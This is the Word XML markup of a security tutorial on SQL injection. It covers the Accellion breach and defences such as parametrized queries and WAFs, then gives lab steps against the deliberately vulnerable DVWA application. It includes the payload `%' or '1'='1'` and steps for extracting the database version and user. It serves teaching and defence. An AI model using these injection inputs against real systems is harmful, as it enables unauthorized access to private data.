    <w:p w14:paraId="39A17DF4" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0369C193" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="841"/>
        </w:tabs>
        <w:ind w:right="119"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The 2020/2021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Accellion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Breach: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Attackers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>used SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>injection vulnerability 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access </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Accellion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Transfer Appliance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Resulted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widespread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breach</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>affecting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>multiple companies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B33E645" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61158B94" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>How</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>to Prevent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2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Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1298948B" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="028761EE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ind w:right="118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Validation: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adheres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allowed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>criteria,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>preventing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-57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injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC49B3D" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77843A57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ind w:right="121"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Parametrized Queries: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Precompile SQL statements, requiring only parameter input for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execution.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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injection by</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>separating SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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from user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26BF21E1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0D837B66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ind w:right="120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Procedures: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Utilize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>stored</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>procedures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control</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>access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database.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-57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in restricting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 of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>arbitrary SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0821B68C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1064DF12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spacing w:before="1"/>
        <w:ind w:right="122"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Character-Escaping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Functions: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Implement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="29"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>functions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escape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="28"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>special</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="32"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>characters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  <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Prevents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being interpreted as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>part of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code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CE7096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72C1E30F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1"/>
        </w:tabs>
        <w:ind w:right="113"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Restrict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Administrative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Privileges:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Avoid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connecting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accounts with excessive privileges. Limits the potential impact of a successful SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1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attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1330BBF9" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FA80D4F" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="660"/>
          <w:tab w:val="left" w:pos="661"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:right="119"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-24"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Application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Firewall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(WAF):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Implement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WAF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filter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monitor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HTTP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traffic.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-57"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Identifies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injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>attempts,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>enhancing overall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7D135EF8" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B2F570A" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="120" w:right="125"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Preventing SQL injection attacks requires a multifaceted approach, including secure coding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>practices, input validation, and the implementation of specific tools and techniques tailored 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programming language</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and database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used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122AF9B8" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15BACEA7" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Pre-requisites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A96A918" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="183"/>
        <w:ind w:left="120" w:right="118"/>
        <w:jc w:val="both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tutorial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>assumes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functioning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>DVWA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>(Damn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Vulnerable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Application)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-58"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>setup.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DVWA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yet installed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Kali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rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>system, please</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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step-by-step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-57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provided in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the related article for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>a comprehensive installation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E1E20C" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34A9C884" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Setup</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>DVWA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-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707E47D7" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="185"/>
        <w:ind w:left="120" w:right="108"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>After successfully installing DVWA, open your preferred web browser and navigate to the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>`&lt;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address&gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dvwa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>`.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credentials,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username is set to "admin," and the password is set to "password." Following a successful</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>login, set the DVWA security level to LOW. You can do this by clicking on the "DVWA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Security" tab and adjusting the security setting. Once completed, click on the "SQL Injection"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-57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left-side</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>menu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379705C8" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:sectPr w:rsidR="00230D57" w:rsidSect="009B67ED">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1360" w:right="1320" w:bottom="280" w:left="1320" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37C59B1B" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="9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8615EB" wp14:editId="2103BCC7">
            <wp:extent cx="4690757" cy="2153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57" cy="21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1F4B" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41A95AD6" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="89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Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190E8E60" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="186"/>
        <w:ind w:left="120" w:right="118"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>In the User ID field, enter “1” and click Submit. This action is expected to display the ID,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1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 and Surname on the screen. Interestingly, by examining the URL, you will notice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-57"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>an injectable parameter, which is the ID. Change the ID parameter in the URL to different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(e.g., 1, 2,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>3, 4)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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>and Surname of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>all users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E78A90D" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55FA500E" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>3:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17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rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>Scenario</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDE1E58" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="183"/>
        <w:ind w:left="120" w:right="118"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An advanced method to extract all the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>First_names</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and Surnames from the database is to use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the input: `%' or '1'='1'`. The percentage (%) sign does not equal anything and will be false.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`'1'='1'`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since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1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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importance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 validation to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>prevent such</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3F2070" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52CC35F0" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Step</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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Version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3E1C70" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="186"/>
        <w:ind w:left="120" w:right="120"/>
        <w:jc w:val="both"/>
      </w:pP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rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>version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DVWA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18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surname. 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specific database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>versions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD5F63E" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07545E40" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="Heading1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User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB079CB" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="183"/>
        <w:ind w:left="120" w:right="122"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>To</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>reveal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PHP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1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powering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line next to the surname field. Knowing the database user is crucial for security assessments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identifying potential points of compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3D3197" w14:textId="77777777" w:rsidR="00230D57" w:rsidRDefault="00230D57" w:rsidP="00230D57">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
      </w:pPr>
